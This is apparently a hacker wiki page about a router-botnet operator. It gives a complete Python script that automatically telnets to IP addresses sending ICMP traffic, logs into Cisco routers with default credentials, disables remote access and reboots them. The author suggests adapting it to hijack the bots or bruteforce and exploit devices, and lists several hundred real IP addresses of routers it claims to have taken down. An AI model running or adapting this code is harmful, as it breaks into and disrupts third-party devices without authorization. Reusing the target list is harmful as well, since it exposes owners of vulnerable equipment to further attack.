DDoS Attacks/takedowns/Krashed
Subject Identification
- First encounter: 2600net, fail DDoS'd home router.
- Aliases: Krashed, [Krashed].
Upon joining my IRC network, Krashed DDoS'd it with his fail Cisco botnet. He scans for routers with the default login as "cisco" then uses them in fail DDoS attacks. To combat this, I wrote the script below which detects incoming ICMP packets (yes, he does use ICMP floods), then telnets back to the connection, logs in with "cisco", runs the enable command to elevate privileges, disables telnet and reboots the router to stop the running attack and prevent any future attacks. He could not put me down after this. It also has support for tcpdump logs and lists of IP addresses, in case you use it after the fact. While this script uses default passwords, it could be modified to use a Cisco IOS exploit or bruteforce the passwords, in case he gets smart (not likely, look at who we are dealing with here, he uses Ciscos). At the bottom, you will find a list of routers taken down by this script, if you happen to be an owner of one of these, please secure your devices, a full reset may be in order.
botnet-takedown.py
#!/usr/bin/python # botnet-takedown.py # (C) 2012 rorschach # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 1, or (at your option) # any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. # # ---------------------------------------------------------------------- # # Cisco botnet takedown script. # Written by rorschach # Use at your own risk, the actions taken by this app may not be legal. # # Run in daemon mode (-d) it will listen for ICMP packets, when it sees one # it will attempt to attack the IP. # # In tcpdump parse mode (-t) it will parse a tcpdump log for offending # IP addresses. # # In IP list mode (-i) it simply takes in a list of IP adresses to attack. # # This script will login to open Cisco routers, turn off telnet and # then reboot it. The functionality could be modified to do things # like take over the bot so only you can use it, turn the attack on # the attacker, etc. The sky is really the limit here. Modify the # takedown() function for this. # # Dependencies: python 2.x and scapy # To install on Ubuntu: # # sudo apt-get install python-scapy # # This script must be ran as root if using daemon mode, due to the fact # that it sniffs packets using scapy. # # Enjoy the script. import sys, telnetlib, re, os, time, socket, threading from threading import Thread from scapy.all import * def usage(argZero): print "Usage: " + argZero print " * -d -- Daemon mode, parse IPs live from incoming ICMP packets." print " * -t <tcpdump log> -- Parse IPs from tcpdump log." print " * -i <ip list> -- Load IPs from list." exit(1) def takedown(ip): # Disable router using telnet. print " [*] Disabling " + ip.rstrip() try: tn = telnetlib.Telnet(ip,23,2) tn.read_until("Password:", timeout=2) # modify these commands to change functionality tn.write("cisco\n") tn.read_until(">", timeout=2) tn.write("enable\n") tn.read_until("Password:", timeout=2) tn.write("cisco\n") tn.read_until("#", timeout=2) tn.write("config\n") tn.read_until("Configuring from terminal, memory, or network [terminal]?", timeout=2) tn.write("\n") tn.read_until("(config)#", timeout=2) tn.write("line vty 0 4\n") tn.read_until("(config-line)#", timeout=2) tn.write("transport input none\n") tn.read_until("(config-line)#", timeout=2) tn.write("^Z\n") tn.read_until("#", timeout=2) tn.write("reload\n") tn.read_until("System configuration has been modified. Save? [yes/no]:", timeout=2) tn.write("yes\n") tn.read_until("Proceed with reload? [confirm]", timeout=2) tn.write("\n") tn.close() except: print " [*] Error: " + ip.rstrip() def takedownParse(pkt,ips): # Parse packets, check to make sure it is an ICMP echo-request, then make sure it has never been seen before, at that point run takedown() if(pkt.summary().split()[2] == "ICMP" and pkt.summary().split()[6] == "echo-request"): ip = pkt.summary().split()[3] check = 0 for eip in ips: if ip.rstrip() == eip.rstrip(): check = 1 break if check == 0: ips.append(ip) f = open("/root/takedown.log", "a+") f.write(ip + "\r\n") f.close() t = threading.Thread(target=takedown,args=(ip,)) t.start() def loadIPs(file): # load IP list from file f = open(file, "r") ips = f.readlines() f.close() for ip in ips: takedown(ip.rstrip()) def parseDumpLogs(host, logFile): # parse tcpdump logs currentTime = time.time() num = 0 print " [*] Initiating takedown" print " [*] Reading tcpdump file" f = open(logFile, "r") # open log, filter out non-icmp packets ips = f.readlines() for n,ip in enumerate(ips): try: if ip.split()[5] == "icmp": ips[n] = ip.split()[2].rstrip() else: ips[n] = "null" except: pass ips = list(set(ips)) # remove duplicates print " [*] Resolving hostnames to IP addresses" for n,ip in enumerate(ips): # if there is a letter in the IP, resolve it to an IP address if(re.search("[a-zA-Z]",ip) != None and ip != socket.gethostname() and ip != "null"): try: tempIP = socket.gethostbyname(ip) if(tempIP != None): ips[n] = tempIP.rstrip() except: pass for n,ip in enumerate(ips): # remove extraneous data if(ip != socket.gethostname() and ip != "null" and ip != ""): if(ip.find(":") != -1): ips[n] = "null" else: num += 1 print " [*] Taking down " + str(num) + " zombies" for ip in ips: # takedown each IP address if(ip != socket.gethostname() and ip != "null" and ip != ""): takedown(ip) print " [*] Takedown complete\r\n\r\nTook down " + str(num) + " IPs in " + str(time.time() / currentTime) + " seconds." def takedownDaemon(): # start sniffing and read IP log f = open("/root/takedown.log", "r") ips = f.readlines() f.close() print "\r\n -- IPs previously taken down -- \r\n" for ip in ips: print " [*] " + ip.rstrip() print "\r\n ------------------------------- \r\n" if os.fork() == 0: if os.fork() == 0: sniff(prn=lambda pkt:takedownParse(pkt,ips), store=0) def main(): print "botnet-takedown.py" if(len(sys.argv) < 2): usage(sys.argv[0]) if(sys.argv[1] == "-d"): # daemon mode takedownDaemon(sys.argv[2]) elif(sys.argv[1] == "-t"): # tcpdump logs if(len(sys.argv) == 3): parseDumpLogs(sys.argv[2]) else: usage(sys.argv[0]) elif(sys.argv[1] == "-i"): # ip log mode if(len(sys.argv) == 3): loadIPs(sys.argv[2]) else: usage(sys.argv[0]) else: usage(sys.argv[0]) if __name__ == "__main__": main() |
Routers
Note: some of these may be active again as the attack was in November.
3.3.3.202 3.3.4.190 3.3.5.114 3.3.6.110 3.3.6.146 3.3.6.210 3.3.7.46 24.120.61.2 59.1.1.2 59.145.212.82 59.152.194.14 59.162.54.122 59.163.206.105 59.163.3.241 59.163.52.73 59.163.59.221 59.163.64.157 59.165.231.9 59.40.180.222 59.46.215.106 59.76.80.6 60.0.0.74 60.10.22.145 60.161.186.113 60.190.101.155 60.190.111.14 60.190.22.26 60.2.145.82 60.254.104.134 60.29.72.90 60.8.226.94 61.123.37.86 61.130.156.201 61.130.156.205 61.134.100.166 61.134.119.44 61.138.210.166 61.138.210.170 61.138.210.2 61.14.39.90 61.148.82.62 61.154.39.14 61.16.152.46 61.16.171.86 61.16.176.190 61.16.180.130 61.16.189.166 61.16.190.70 61.163.67.69 61.178.127.119 61.184.82.154 61.185.139.71 61.19.126.74 61.19.45.194 61.232.9.50 61.246.219.210 61.250.94.2 61.33.222.98 61.33.78.185 61.7.234.70 64.125.187.34 64.197.240.138 64.206.168.162 64.233.81.122 64.244.145.40 64.64.64.64 64.76.99.122 65.122.22.178 65.19.157.228 66.110.118.202 66.192.145.5 66.208.254.233 66.248.174.26 67.149.91.119 67.215.65.132 69.93.66.2 71.1.100.155 78.7.92.106 80.120.176.62 80.120.176.66 80.23.119.118 80.255.42.54 80.50.125.38 80.50.41.62 81.17.136.148 81.211.44.76 82.114.167.106 82.128.123.98 82.150.33.28 82.158.35.124 82.178.22.60 82.204.6.6 85.33.115.122 85.33.12.214 85.37.7.142 85.42.145.162 85.44.198.102 86.51.156.222 88.39.26.122 88.44.43.234 88.49.134.203 88.50.227.10 88.52.15.203 88.53.27.102 88.56.8.236 88.58.20.170 88.60.166.42 88.60.18.146 88.61.134.189 88.63.43.14 89.121.211.174 89.222.211.218 89.252.141.2 91.116.150.22 94.174.182.14 94.175.226.82 94.200.122.210 94.40.10.90 94.77.209.106 94.77.209.50 94.77.209.54 94.86.74.60 94.87.209.63 94.88.148.122 94.90.57.114 94.91.106.254 94.92.106.173 94.92.106.226 94.92.106.82 94.92.110.246 94.92.112.58 94.92.117.122 94.92.122.154 94.92.68.130 94.92.68.131 94.92.68.174 94.93.204.114 94.95.230.6 97.65.105.94 98.23.121.130 111.252.205.23 112.179.62.47 115.113.26.26 115.92.248.58 117.8.12.6 119.226.35.102 121.253.217.230 121.96.70.246 123.131.127.74 123.133.133.42 123.140.32.250 123.140.32.252 123.140.32.254 123.178.136.126 123.232.106.12 123.27.62.13 123.30.20.210 123.30.20.218 123.30.33.78 124.126.245.182 124.205.51.58 124.247.199.126 124.247.240.218 124.29.251.238 124.30.121.106 124.30.123.138 124.30.127.26 124.30.135.130 124.30.138.150 124.30.140.206 124.30.145.106 124.30.154.14 124.30.154.166 124.30.166.74 124.30.18.130 124.30.188.242 124.30.208.170 124.30.36.174 124.30.48.198 124.30.52.82 124.30.97.102 124.42.106.156 124.47.12.18 124.65.80.66 124.67.64.26 124.74.25.142 124.74.27.230 124.74.44.98 124.74.97.66 125.158.30.230 125.16.149.218 125.16.149.66 125.16.217.114 125.16.217.90 125.16.27.84 125.16.90.214 125.17.16.186 125.18.253.118 125.19.192.58 125.19.208.22 125.19.211.30 125.19.38.218 125.19.45.10 125.19.45.178 125.19.48.58 125.20.210.2 125.20.32.190 125.20.32.2 125.20.32.46 125.21.160.174 125.21.80.2 125.21.83.1 125.21.83.105 125.21.83.113 125.21.83.121 125.212.32.10 125.212.33.210 125.22.194.178 125.22.30.74 125.22.51.182 125.23.162.86 125.23.168.2 125.234.240.2 125.235.11.46 125.249.92.122 125.249.92.126 125.254.40.226 125.35.85.182 125.35.92.38 125.46.55.242 125.5.98.94 125.60.64.94 125.64.39.66 125.74.189.34 140.112.0.109 140.112.98.252 140.114.109.252 140.114.109.253 140.115.131.250 140.116.160.254 140.116.180.252 140.116.198.252 140.116.199.252 140.116.243.138 140.116.243.170 140.116.243.194 140.116.243.22 140.116.243.246 140.122.60.115 140.123.244.200 140.125.150.251 140.137.32.1 140.137.32.2 142.177.149.166 144.223.10.118 150.93.240.251 152.179.26.198 168.131.100.112 168.187.101.10 168.187.101.22 168.187.109.46 168.187.233.97 168.187.59.6 173.12.198.107 173.245.50.236 174.136.103.74 177.16.158.56 184.171.166.186 184.172.247.57 186.42.199.150 186.42.199.254 186.42.199.50 186.42.199.58 186.42.214.106 186.42.214.150 186.42.214.78 186.42.227.130 186.42.255.130 186.46.3.186 186.46.30.118 186.46.30.146 186.46.30.218 186.46.42.130 186.46.42.146 186.46.56.226 186.46.58.10 186.46.59.218 187.12.161.138 187.12.163.146 187.12.163.242 187.12.164.90 187.12.165.98 187.12.166.234 187.12.166.66 187.12.170.194 187.12.217.194 187.125.129.166 187.125.188.198 187.125.55.138 187.125.89.122 187.125.92.82 187.4.74.138 187.4.74.142 187.4.74.158 187.4.74.170 187.4.74.174 187.4.74.186 187.4.75.222 187.4.77.250 187.72.56.25 187.76.127.246 187.76.147.46 187.76.158.138 187.76.213.42 187.76.233.178 187.76.233.234 187.92.123.34 189.2.125.182 189.203.17.22 189.206.15.86 189.210.7.246 189.52.179.174 189.52.192.194 189.52.192.58 189.53.36.210 189.53.69.198 189.56.165.190 189.75.194.62 189.80.51.62 189.86.25.238 190.104.1.214 190.105.172.2 190.116.114.30 190.129.78.81 190.152.17.234 190.152.88.58 190.167.192.21 190.168.111.2 190.41.184.161 190.80.159.85 190.81.14.36 190.81.16.90 190.81.18.84 190.81.19.91 190.81.2.116 190.81.2.48 190.81.2.79 190.81.2.82 190.81.20.56 190.81.20.72 190.81.20.79 190.81.20.84 190.81.20.86 190.81.20.98 190.81.200.49 190.81.215.150 190.81.216.80 190.81.217.21 190.81.222.45 190.81.222.53 190.81.225.106 190.81.225.95 190.81.230.250 190.81.231.113 190.81.232.118 190.81.233.76 190.81.235.226 190.81.239.100 190.81.241.134 190.81.255.13 190.81.34.246 190.81.4.24 190.81.6.96 190.81.64.3 190.81.70.13 190.81.70.38 190.81.70.73 190.81.70.82 190.81.72.240 190.81.72.73 190.81.73.163 190.81.74.4 190.81.8.22 190.81.80.190 190.81.82.8 190.81.87.67 192.192.7.174 192.192.7.34 192.8.194.242 193.22.172.239 194.186.184.26 194.84.255.61 195.202.65.109 195.202.88.5 195.230.58.197 195.239.133.62 195.24.215.70 195.39.169.186 196.200.91.171 196.202.245.170 196.219.199.171 196.25.14.222 196.28.245.102 196.44.48.137 2.113.44.250 200.101.65.126 200.11.214.254 200.110.80.98 200.12.229.190 200.140.144.10 200.149.32.26 200.151.200.230 200.151.223.66 200.151.241.34 200.151.86.34 200.155.146.42 200.164.72.62 200.164.87.26 200.164.92.66 200.165.146.226 200.165.164.78 200.167.224.138 200.167.42.254 200.174.44.178 200.179.207.250 200.183.19.114 200.187.145.14 200.199.174.10 200.199.64.50 200.202.211.158 200.208.247.42 200.211.163.46 200.211.180.194 200.214.131.238 200.214.175.86 200.214.224.162 200.216.223.58 200.216.228.238 200.216.228.82 200.216.244.74 200.216.55.18 200.216.55.58 200.216.60.10 200.216.64.182 200.217.222.110 200.217.222.218 200.217.75.70 200.217.75.78 200.217.75.82 200.222.107.206 200.223.136.190 200.223.136.98 200.223.234.254 200.223.3.250 200.223.64.10 200.223.8.114 200.223.80.18 200.236.1.227 200.241.190.206 200.242.157.254 200.242.226.130 200.246.107.102 200.248.199.202 200.252.110.34 200.252.110.82 200.252.114.234 200.252.247.18 200.254.109.134 200.36.163.58 200.36.172.186 200.36.173.110 200.36.178.150 200.37.200.36 200.37.234.109 200.38.8.206 200.44.153.142 200.50.20.218 200.52.141.146 200.52.4.117 200.62.172.174 200.76.84.150 200.76.84.162 200.76.85.242 200.87.109.234 200.87.132.41 200.87.132.97 200.87.141.129 200.87.148.209 200.88.212.101 201.18.35.50 201.198.255.250 201.217.24.12 201.30.88.82 201.31.50.230 201.34.1.122 201.35.63.174 201.45.88.82 201.56.97.134 201.57.197.222 201.57.36.42 201.64.0.142 201.72.148.234 201.72.209.174 201.72.250.206 201.90.48.118 201.90.48.198 202.100.151.30 202.100.151.82 202.101.179.254 202.103.10.170 202.103.228.86 202.106.57.122 202.131.146.1 202.153.38.230 202.158.165.246 202.159.226.50 202.163.89.132 202.163.95.23 202.166.198.22 202.166.198.81 202.177.148.182 202.177.165.46 202.177.30.166 202.190.73.230 202.216.244.132 202.216.244.133 202.39.144.53 202.40.236.75 202.47.230.6 202.47.231.214 202.47.250.119 202.51.181.20 202.54.115.74 202.54.12.12 202.54.12.82 202.54.42.5 202.54.51.51 202.7.188.114 202.73.39.14 202.75.159.226 202.79.204.195 202.79.204.198 202.83.107.114 202.85.218.14 202.96.103.105 202.96.17.50 202.97.156.58 202.98.24.113 202.99.72.61 203.115.4.150 203.115.8.214 203.122.43.101 203.123.142.210 203.123.144.30 203.123.144.6 203.123.187.162 203.134.120.50 203.152.9.62 203.155.221.252 203.156.204.193 203.156.212.246 203.156.240.6 203.162.143.86 203.166.46.38 203.170.178.206 203.187.228.14 203.189.149.68 203.196.139.30 203.196.140.46 203.196.166.38 203.196.167.210 203.197.114.70 203.197.130.13 203.197.143.225 203.199.189.250 203.199.94.245 203.200.85.38 203.201.220.50 203.201.60.230 203.201.61.114 203.201.61.206 203.201.61.26 203.221.1.122 203.248.27.16 203.250.100.2 203.250.100.4 203.253.90.109 203.58.22.42 203.58.28.214 203.66.61.65 203.72.191.42 203.90.78.106 203.90.93.88 203.94.91.22 204.110.12.181 204.110.12.189 205.125.14.253 205.171.45.194 205.244.148.134 206.82.204.36 207.225.193.110 208.110.253.240 208.158.6.202 208.180.227.163 208.48.207.131 209.101.234.166 209.124.97.10 209.146.175.33 209.201.118.173 209.210.8.74 209.253.110.102 210.101.74.252 210.123.181.62 210.176.115.26 210.177.35.130 210.18.119.102 210.18.28.66 210.18.31.78 210.18.39.138 210.18.49.42 210.18.61.134 210.183.92.78 210.19.5.134 210.19.7.162 210.208.119.251 210.210.102.22 210.210.103.130 210.210.39.182 210.210.45.70 210.210.57.18 210.210.71.234 210.210.98.234 210.212.180.241 210.212.201.194 210.212.88.56 210.212.95.50 210.222.178.150 210.241.31.229 210.242.94.177 210.27.177.22 210.5.24.58 210.69.9.109 210.73.73.253 210.73.74.253 210.74.174.250 210.82.91.29 210.83.161.26 210.94.139.250 211.103.128.2 211.103.246.94 211.119.123.161 211.137.166.158 211.138.144.70 211.142.85.79 211.143.119.146 211.144.97.67 211.152.47.142 211.180.234.122 211.185.16.126 211.223.116.211 211.24.227.237 211.24.255.126 211.25.222.82 211.38.144.253 211.40.204.2 211.43.211.77 211.50.146.124 211.50.146.126 211.72.69.189 211.75.103.205 211.76.116.12 211.90.80.254 211.92.13.246 211.95.4.138 211.95.6.50 211.99.135.200 211.99.14.38 212.116.194.254 212.116.202.182 212.119.80.52 212.127.5.250 212.154.163.82 212.154.184.2 212.154.245.34 212.156.122.178 212.156.59.114 212.156.81.82 212.174.109.51 212.175.9.19 212.19.159.50 212.248.126.58 212.46.2.251 212.66.97.250 212.88.100.130 212.88.102.10 212.88.103.218 213.160.184.219 213.166.136.2 213.166.136.253 213.166.136.3 213.166.136.4 213.166.136.6 213.172.200.55 213.172.65.31 213.175.168.210 213.181.170.242 213.186.33.13 213.193.36.134 213.193.36.135 213.193.36.139 213.210.206.75 213.227.26.75 213.236.32.140 213.236.32.142 213.241.195.18 213.33.217.214 213.42.104.34 213.42.130.158 213.42.133.166 213.42.133.70 213.42.160.138 213.42.163.170 213.42.192.150 213.42.223.2 213.42.224.66 213.42.65.246 213.42.66.254 213.60.185.27 213.60.186.136 217.139.107.118 217.141.212.2 217.19.148.158 217.199.153.126 217.28.248.30 217.74.238.90 218.236.209.50 218.57.87.6 218.89.135.235 220.245.231.66 221.10.151.3 222.127.102.82 222.223.131.78 222.42.255.82